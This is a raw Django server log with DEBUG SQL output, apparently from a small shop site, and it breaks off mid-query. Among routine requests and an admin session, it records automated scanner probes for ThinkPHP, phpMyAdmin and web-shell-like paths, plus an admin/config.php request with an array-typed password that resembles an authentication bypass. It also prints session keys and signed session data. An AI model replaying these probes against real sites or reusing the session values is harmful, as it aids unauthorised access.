HTTP/1.0" 302 0 [05/Dec/2019 22:05:02] "GET / HTTP/1.0" 302 0 [05/Dec/2019 22:10:05] "GET / HTTP/1.0" 302 0 [05/Dec/2019 22:15:26] "GET / HTTP/1.0" 302 0 [05/Dec/2019 22:23:45] "GET / HTTP/1.0" 302 0 [05/Dec/2019 22:27:49] "GET / HTTP/1.0" 302 0 [05/Dec/2019 22:28:47] "GET / HTTP/1.0" 302 0 [05/Dec/2019 22:35:39] "GET / HTTP/1.0" 302 0 [05/Dec/2019 22:42:05] "GET / HTTP/1.0" 302 0 [05/Dec/2019 22:47:07] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [05/Dec/2019 22:47:33] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/Index.asp [05/Dec/2019 22:47:49] "GET /User/Index.asp HTTP/1.0" 404 6636 Not Found: /newslist.asp [05/Dec/2019 22:48:04] "GET /newslist.asp?type=4&id=1330 HTTP/1.0" 404 6649 [05/Dec/2019 22:52:10] "GET / HTTP/1.0" 302 0 [05/Dec/2019 22:57:13] "GET / HTTP/1.0" 302 0 [05/Dec/2019 23:05:02] "GET / HTTP/1.0" 302 0 [05/Dec/2019 23:10:05] "GET / HTTP/1.0" 302 0 [05/Dec/2019 23:15:08] "GET / HTTP/1.0" 302 0 [05/Dec/2019 23:20:31] "GET / HTTP/1.0" 302 0 [05/Dec/2019 23:25:33] "GET / HTTP/1.0" 302 0 [05/Dec/2019 23:30:35] "GET / HTTP/1.0" 302 0 [05/Dec/2019 23:37:37] "GET / HTTP/1.0" 302 0 [05/Dec/2019 23:42:39] "GET / HTTP/1.0" 302 0 [05/Dec/2019 23:47:42] "GET / HTTP/1.0" 302 0 [05/Dec/2019 23:51:11] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 23:51:12,007 utils 28908 140676850300672 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'tuuk8ytcdu3ezo0yrgrgpxxmvgu19irf' LIMIT 1; args=('tuuk8ytcdu3ezo0yrgrgpxxmvgu19irf',) DEBUG 2019-12-05 23:51:12,008 utils 28908 140676850300672 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('tuuk8ytcdu3ezo0yrgrgpxxmvgu19irf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-19T23:51:12.007546+00:00'::timestamptz); args=('tuuk8ytcdu3ezo0yrgrgpxxmvgu19irf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 19, 23, 51, 12, 7546, tzinfo=)) [05/Dec/2019 23:51:12] "GET /login/?next=/ HTTP/1.0" 200 1786 [05/Dec/2019 23:55:13] "GET / HTTP/1.0" 302 0 [06/Dec/2019 00:02:54] "GET / HTTP/1.0" 302 0 [06/Dec/2019 00:05:03] "GET / HTTP/1.0" 302 0 [06/Dec/2019 00:07:32] "GET / HTTP/1.0" 302 0 [06/Dec/2019 00:10:05] "GET / HTTP/1.0" 302 0 [06/Dec/2019 00:15:08] "GET / HTTP/1.0" 302 0 [06/Dec/2019 00:19:17] "GET / HTTP/1.0" 302 0 [06/Dec/2019 00:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [06/Dec/2019 00:21:37] "GET / HTTP/1.0" 302 0 [06/Dec/2019 00:30:06] "GET / HTTP/1.0" 302 0 [06/Dec/2019 00:37:37] "GET / HTTP/1.0" 302 0 [06/Dec/2019 00:42:40] "GET / HTTP/1.0" 302 0 [06/Dec/2019 00:47:43] "GET / HTTP/1.0" 302 0 [06/Dec/2019 00:52:46] "GET / HTTP/1.0" 302 0 [06/Dec/2019 00:57:48] "GET / HTTP/1.0" 302 0 [06/Dec/2019 01:07:26] "GET / HTTP/1.0" 302 0 [06/Dec/2019 01:13:13] "GET / HTTP/1.0" 302 0 [06/Dec/2019 01:20:40] "GET / HTTP/1.0" 302 0 [06/Dec/2019 01:25:43] "GET / HTTP/1.0" 302 0 [06/Dec/2019 01:30:45] "GET / HTTP/1.0" 302 0 [06/Dec/2019 01:39:41] "GET / HTTP/1.0" 302 0 [06/Dec/2019 01:44:43] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [06/Dec/2019 01:46:56] "GET /TP/public/index.php HTTP/1.0" 404 6650 Not Found: /TP/index.php [06/Dec/2019 01:46:57] "GET /TP/index.php HTTP/1.0" 404 6629 Not Found: /thinkphp/html/public/index.php [06/Dec/2019 01:46:57] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6683 [06/Dec/2019 01:47:02] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 01:47:03,458 utils 28908 140676850300672 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'hb53d9d8u0ztf8k2gvx15ihv4c7fsqna' LIMIT 1; args=('hb53d9d8u0ztf8k2gvx15ihv4c7fsqna',) DEBUG 2019-12-06 01:47:03,460 utils 28908 140676850300672 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('hb53d9d8u0ztf8k2gvx15ihv4c7fsqna', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-20T01:47:03.458793+00:00'::timestamptz); args=('hb53d9d8u0ztf8k2gvx15ihv4c7fsqna', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 20, 1, 47, 3, 458793, tzinfo=)) [06/Dec/2019 01:47:03] "GET /login/?next=/ HTTP/1.0" 200 1786 [06/Dec/2019 01:49:46] "GET / HTTP/1.0" 302 0 Not Found: /upgrade.aspx [06/Dec/2019 01:54:28] "POST /upgrade.aspx?a1=a51599c6 HTTP/1.0" 404 6642 [06/Dec/2019 01:54:49] "GET / HTTP/1.0" 302 0 [06/Dec/2019 02:00:01] "GET / HTTP/1.0" 302 0 [06/Dec/2019 02:05:04] "GET / HTTP/1.0" 302 0 [06/Dec/2019 02:10:07] "GET / HTTP/1.0" 302 0 [06/Dec/2019 02:15:40] "GET / HTTP/1.0" 302 0 [06/Dec/2019 02:22:37] "GET / HTTP/1.0" 302 0 [06/Dec/2019 02:27:40] "GET / HTTP/1.0" 302 0 [06/Dec/2019 02:37:37] "GET / HTTP/1.0" 302 0 [06/Dec/2019 02:45:24] "GET / HTTP/1.0" 302 0 [06/Dec/2019 02:50:26] "GET / HTTP/1.0" 302 0 [06/Dec/2019 02:56:04] "GET / HTTP/1.0" 302 0 [06/Dec/2019 03:05:03] "GET / HTTP/1.0" 302 0 [06/Dec/2019 03:10:05] "GET / HTTP/1.0" 302 0 [06/Dec/2019 03:15:08] "GET / HTTP/1.0" 302 0 [06/Dec/2019 03:20:10] "GET / HTTP/1.0" 302 0 [06/Dec/2019 03:25:31] "GET / HTTP/1.0" 302 0 [06/Dec/2019 03:30:34] "GET / HTTP/1.0" 302 0 [06/Dec/2019 03:37:38] "GET / HTTP/1.0" 302 0 [06/Dec/2019 03:42:41] "GET / HTTP/1.0" 302 0 [06/Dec/2019 03:47:43] "GET / HTTP/1.0" 302 0 [06/Dec/2019 03:52:46] "GET / HTTP/1.0" 302 0 [06/Dec/2019 04:00:02] "GET / HTTP/1.0" 302 0 [06/Dec/2019 04:09:41] "GET / HTTP/1.0" 302 0 Not Found: /B038616C8DCB7174AD7A66731B3E293C.php [06/Dec/2019 04:11:10] "GET /B038616C8DCB7174AD7A66731B3E293C.php HTTP/1.0" 404 6701 Not Found: /e6087adbccc347d008ee55f34e51f3cb.php [06/Dec/2019 04:11:10] "GET /e6087adbccc347d008ee55f34e51f3cb.php HTTP/1.0" 404 6701 Not Found: /phpMyAdmin/index.php [06/Dec/2019 04:11:10] "GET /phpMyAdmin/index.php HTTP/1.0" 404 6653 Not Found: /phpmyadmin/index.php [06/Dec/2019 04:11:10] "GET /phpmyadmin/index.php HTTP/1.0" 404 6653 [06/Dec/2019 04:16:13] "GET / HTTP/1.0" 302 0 [06/Dec/2019 04:19:41] "GET / HTTP/1.0" 302 0 [06/Dec/2019 04:21:16] "GET / HTTP/1.0" 302 0 [06/Dec/2019 04:26:18] "GET / HTTP/1.0" 302 0 [06/Dec/2019 04:31:21] "GET / HTTP/1.0" 302 0 [06/Dec/2019 04:39:50] "GET / HTTP/1.0" 302 0 [06/Dec/2019 04:42:41] "GET / HTTP/1.0" 302 0 [06/Dec/2019 04:44:53] "GET / HTTP/1.0" 302 0 [06/Dec/2019 04:49:56] "GET / HTTP/1.0" 302 0 [06/Dec/2019 04:51:51] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 04:51:53,719 utils 28908 140676850300672 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'dfw1u0oaxqbzlc8y99gd50wc9awei4ed' LIMIT 1; args=('dfw1u0oaxqbzlc8y99gd50wc9awei4ed',) DEBUG 2019-12-06 04:51:53,720 utils 28908 140676850300672 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('dfw1u0oaxqbzlc8y99gd50wc9awei4ed', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-20T04:51:53.719390+00:00'::timestamptz); args=('dfw1u0oaxqbzlc8y99gd50wc9awei4ed', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 20, 4, 51, 53, 719390, tzinfo=)) [06/Dec/2019 04:51:53] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /index.asp [06/Dec/2019 04:51:59] "GET /index.asp HTTP/1.0" 404 6621 [06/Dec/2019 04:54:58] "GET / HTTP/1.0" 302 0 [06/Dec/2019 05:00:02] "GET / HTTP/1.0" 302 0 [06/Dec/2019 05:05:38] "GET / HTTP/1.0" 302 0 [06/Dec/2019 05:10:59] "GET / HTTP/1.0" 302 0 Not Found: /images.php [06/Dec/2019 05:13:15] "POST /images.php HTTP/1.0" 404 6624 [06/Dec/2019 05:16:02] "GET / HTTP/1.0" 302 0 [06/Dec/2019 05:21:04] "GET / HTTP/1.0" 302 0 [06/Dec/2019 05:26:07] "GET / HTTP/1.0" 302 0 [06/Dec/2019 05:31:09] "GET / HTTP/1.0" 302 0 [06/Dec/2019 05:37:37] "GET / HTTP/1.0" 302 0 [06/Dec/2019 05:43:18] "GET / HTTP/1.0" 302 0 [06/Dec/2019 05:44:39] "GET / HTTP/1.0" 302 0 [06/Dec/2019 05:48:20] "GET / HTTP/1.0" 302 0 [06/Dec/2019 05:53:23] "GET / HTTP/1.0" 302 0 [06/Dec/2019 05:58:26] "GET / HTTP/1.0" 302 0 [06/Dec/2019 06:05:03] "GET / HTTP/1.0" 302 0 [06/Dec/2019 06:10:05] "GET / HTTP/1.0" 302 0 [06/Dec/2019 06:15:08] "GET / HTTP/1.0" 302 0 [06/Dec/2019 06:20:10] "GET / HTTP/1.0" 302 0 [06/Dec/2019 06:25:13] "GET / HTTP/1.0" 302 0 [06/Dec/2019 06:30:16] "GET / HTTP/1.0" 302 0 [06/Dec/2019 06:35:17] "GET / HTTP/1.0" 302 0 [06/Dec/2019 06:41:02] "GET / HTTP/1.0" 302 0 [06/Dec/2019 06:46:04] "GET / HTTP/1.0" 302 0 [06/Dec/2019 06:51:07] "GET / HTTP/1.0" 302 0 [06/Dec/2019 06:56:10] "GET / HTTP/1.0" 302 0 [06/Dec/2019 07:05:02] "GET / HTTP/1.0" 302 0 [06/Dec/2019 07:07:09] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 07:07:11,623 utils 28908 140676850300672 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ctgxt9qu20mofom7y7752q3h26lg9trb' LIMIT 1; args=('ctgxt9qu20mofom7y7752q3h26lg9trb',) DEBUG 2019-12-06 07:07:11,625 utils 28908 140676850300672 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ctgxt9qu20mofom7y7752q3h26lg9trb', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-20T07:07:11.624406+00:00'::timestamptz); args=('ctgxt9qu20mofom7y7752q3h26lg9trb', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 20, 7, 7, 11, 624406, tzinfo=)) [06/Dec/2019 07:07:11] "GET /login/?next=/ HTTP/1.0" 200 1786 [06/Dec/2019 07:10:05] "GET / HTTP/1.0" 302 0 [06/Dec/2019 07:15:56] "GET / HTTP/1.0" 302 0 [06/Dec/2019 07:22:36] "GET / HTTP/1.0" 302 0 [06/Dec/2019 07:29:33] "GET / HTTP/1.0" 302 0 [06/Dec/2019 07:36:24] "GET / HTTP/1.0" 302 0 [06/Dec/2019 07:43:23] "GET / HTTP/1.0" 302 0 [06/Dec/2019 07:48:37] "GET / HTTP/1.0" 302 0 [06/Dec/2019 07:53:38] "GET / HTTP/1.0" 302 0 [06/Dec/2019 08:00:02] "GET / HTTP/1.0" 302 0 [06/Dec/2019 08:08:22] "GET / HTTP/1.0" 302 0 [06/Dec/2019 08:17:03] "GET / HTTP/1.0" 302 0 [06/Dec/2019 08:22:06] "GET / HTTP/1.0" 302 0 [06/Dec/2019 08:27:09] "GET / HTTP/1.0" 302 0 [06/Dec/2019 08:32:12] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [06/Dec/2019 08:36:49] "GET /TP/public/index.php HTTP/1.0" 404 6650 Not Found: /TP/index.php [06/Dec/2019 08:36:50] "GET /TP/index.php HTTP/1.0" 404 6629 Not Found: /thinkphp/html/public/index.php [06/Dec/2019 08:36:50] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6683 Not Found: /html/public/index.php [06/Dec/2019 08:36:51] "GET /html/public/index.php HTTP/1.0" 404 6656 Not Found: /public/index.php [06/Dec/2019 08:36:52] "GET /public/index.php HTTP/1.0" 404 6641 Not Found: /TP/html/public/index.php [06/Dec/2019 08:36:54] "GET /TP/html/public/index.php HTTP/1.0" 404 6665 Not Found: /elrekt.php [06/Dec/2019 08:36:54] "GET /elrekt.php HTTP/1.0" 404 6623 Not Found: /index.php [06/Dec/2019 08:36:55] "GET /index.php HTTP/1.0" 404 6620 [06/Dec/2019 08:36:55] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 08:36:57,185 utils 28908 140676850300672 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '59wdoswxc1yda79gzqkeec80by1ugmsw' LIMIT 1; args=('59wdoswxc1yda79gzqkeec80by1ugmsw',) DEBUG 2019-12-06 08:36:57,187 utils 28908 140676850300672 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('59wdoswxc1yda79gzqkeec80by1ugmsw', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-20T08:36:57.185746+00:00'::timestamptz); args=('59wdoswxc1yda79gzqkeec80by1ugmsw', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 20, 8, 36, 57, 185746, tzinfo=)) [06/Dec/2019 08:36:57] "GET /login/?next=/ HTTP/1.0" 200 1786 [06/Dec/2019 08:38:15] "GET / HTTP/1.0" 302 0 [06/Dec/2019 08:41:13] "GET / HTTP/1.0" 302 0 [06/Dec/2019 08:45:30] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 08:45:30,830 utils 28908 140676850300672 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'sepf1hij4smtbnil1fumeh9cjiec9uq2' LIMIT 1; args=('sepf1hij4smtbnil1fumeh9cjiec9uq2',) DEBUG 2019-12-06 08:45:30,832 utils 28908 140676850300672 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('sepf1hij4smtbnil1fumeh9cjiec9uq2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-20T08:45:30.830799+00:00'::timestamptz); args=('sepf1hij4smtbnil1fumeh9cjiec9uq2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 20, 8, 45, 30, 830799, tzinfo=)) [06/Dec/2019 08:45:30] "GET /login/?next=/ HTTP/1.0" 200 1786 [06/Dec/2019 08:47:04] "GET / HTTP/1.0" 302 0 [06/Dec/2019 08:52:07] "GET / HTTP/1.0" 302 0 [06/Dec/2019 08:57:09] "GET / HTTP/1.0" 302 0 [06/Dec/2019 09:05:03] "GET / HTTP/1.0" 302 0 [06/Dec/2019 09:10:06] "GET / HTTP/1.0" 302 0 [06/Dec/2019 09:15:09] "GET / HTTP/1.0" 302 0 [06/Dec/2019 09:20:11] "GET / HTTP/1.0" 302 0 [06/Dec/2019 09:25:14] "GET / HTTP/1.0" 302 0 [06/Dec/2019 09:30:16] "GET / HTTP/1.0" 302 0 [06/Dec/2019 09:37:37] "GET / HTTP/1.0" 302 0 [06/Dec/2019 09:42:39] "GET / HTTP/1.0" 302 0 [06/Dec/2019 09:47:42] "GET / HTTP/1.0" 302 0 [06/Dec/2019 09:52:45] "GET / HTTP/1.0" 302 0 [06/Dec/2019 09:57:47] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [06/Dec/2019 09:59:35] "GET /proxy.php HTTP/1.0" 404 6629 [06/Dec/2019 10:05:03] "GET / HTTP/1.0" 302 0 [06/Dec/2019 10:10:02] "GET /whm-server-status HTTP/1.0" 301 0 [06/Dec/2019 10:10:06] "GET / HTTP/1.0" 302 0 [06/Dec/2019 10:15:09] "GET / HTTP/1.0" 302 0 [06/Dec/2019 10:20:12] "GET / HTTP/1.0" 302 0 [06/Dec/2019 10:25:27] "GET / HTTP/1.0" 302 0 [06/Dec/2019 10:32:36] "GET / HTTP/1.0" 302 0 [06/Dec/2019 10:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [06/Dec/2019 10:37:39] "GET / HTTP/1.0" 302 0 [06/Dec/2019 10:42:42] "GET / HTTP/1.0" 302 0 [06/Dec/2019 10:47:45] "GET / HTTP/1.0" 302 0 [06/Dec/2019 10:48:30] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 10:48:30,652 utils 28908 140676850300672 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'zuvg39lftf8o8twpr0v5bzjsr8j1kwkv' LIMIT 1; args=('zuvg39lftf8o8twpr0v5bzjsr8j1kwkv',) DEBUG 2019-12-06 10:48:30,655 utils 28908 140676850300672 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('zuvg39lftf8o8twpr0v5bzjsr8j1kwkv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-20T10:48:30.653536+00:00'::timestamptz); args=('zuvg39lftf8o8twpr0v5bzjsr8j1kwkv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 20, 10, 48, 30, 653536, tzinfo=)) [06/Dec/2019 10:48:30] "GET /login/?next=/ HTTP/1.0" 200 1786 [06/Dec/2019 10:48:32] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [06/Dec/2019 10:48:32] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [06/Dec/2019 10:48:32] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [06/Dec/2019 10:48:32] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [06/Dec/2019 10:48:33] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [06/Dec/2019 10:48:33] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [06/Dec/2019 10:52:48] "GET / HTTP/1.0" 302 0 [06/Dec/2019 10:58:45] "GET / HTTP/1.0" 302 0 [06/Dec/2019 11:05:02] "GET / HTTP/1.0" 302 0 [06/Dec/2019 11:11:54] "GET / HTTP/1.0" 302 0 [06/Dec/2019 11:14:27] "GET / HTTP/1.0" 302 0 [06/Dec/2019 11:19:30] "GET / HTTP/1.0" 302 0 [06/Dec/2019 11:24:33] "GET / HTTP/1.0" 302 0 [06/Dec/2019 11:29:35] "GET / HTTP/1.0" 302 0 [06/Dec/2019 11:37:37] "GET / HTTP/1.0" 302 0 [06/Dec/2019 11:42:39] "GET / HTTP/1.0" 302 0 [06/Dec/2019 11:47:42] "GET / HTTP/1.0" 302 0 [06/Dec/2019 11:52:45] "GET / HTTP/1.0" 302 0 [06/Dec/2019 11:57:48] "GET / HTTP/1.0" 302 0 [06/Dec/2019 12:03:42] "GET / HTTP/1.0" 302 0 [06/Dec/2019 12:08:45] "GET / HTTP/1.0" 302 0 [06/Dec/2019 12:13:48] "GET / HTTP/1.0" 302 0 [06/Dec/2019 12:16:39] "GET / HTTP/1.0" 302 0 [06/Dec/2019 12:18:50] "GET / HTTP/1.0" 302 0 [06/Dec/2019 12:24:57] "GET / HTTP/1.0" 302 0 [06/Dec/2019 12:30:00] "GET / HTTP/1.0" 302 0 Not Found: //admin/config.php [06/Dec/2019 12:36:36] "GET //admin/config.php?password%5B0%5D=bebydviyx&username=admin HTTP/1.0" 404 6689 [06/Dec/2019 12:37:37] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 12:40:04,354 utils 28908 140676850300672 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:40:04.340472+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 6, 12, 40, 4, 340472, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-06 12:40:04,366 utils 28908 140676850300672 (0.004) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 12:40:04,449 utils 28908 140676850300672 (0.013) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) Not Found: /robots.txt [06/Dec/2019 12:40:04] "GET /robots.txt HTTP/1.0" 404 6626 DEBUG 2019-12-06 12:40:04,465 utils 28908 140676850300672 (0.004) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T12:40:04.459535+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 12, 40, 4, 459535, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [06/Dec/2019 12:40:04] "GET / HTTP/1.0" 200 6893 [06/Dec/2019 12:40:05] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [06/Dec/2019 12:40:05] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [06/Dec/2019 12:40:05] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [06/Dec/2019 12:40:05] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [06/Dec/2019 12:40:06] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [06/Dec/2019 12:40:06] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [06/Dec/2019 12:40:06] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [06/Dec/2019 12:40:06] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [06/Dec/2019 12:40:06] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 Not Found: /favicon.ico [06/Dec/2019 12:40:07] "GET /favicon.ico HTTP/1.0" 404 6629 DEBUG 2019-12-06 12:40:09,339 utils 28908 140676876654336 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:40:09.325370+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 6, 12, 40, 9, 325370, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-06 12:40:09,343 utils 28908 140676876654336 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 12:40:09,432 utils 28908 140676876654336 (0.004) DECLARE "_django_curs_140676876654336_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-06 12:40:09,533 utils 28908 140676876654336 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T12:40:09.530267+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 12, 40, 9, 530267, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [06/Dec/2019 12:40:09] "GET /shop/product/add/ HTTP/1.0" 200 8080 DEBUG 2019-12-06 12:40:09,915 utils 28908 140676850300672 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:40:09.906116+00:00'::timestamptz AND "django_session"."session_key" = 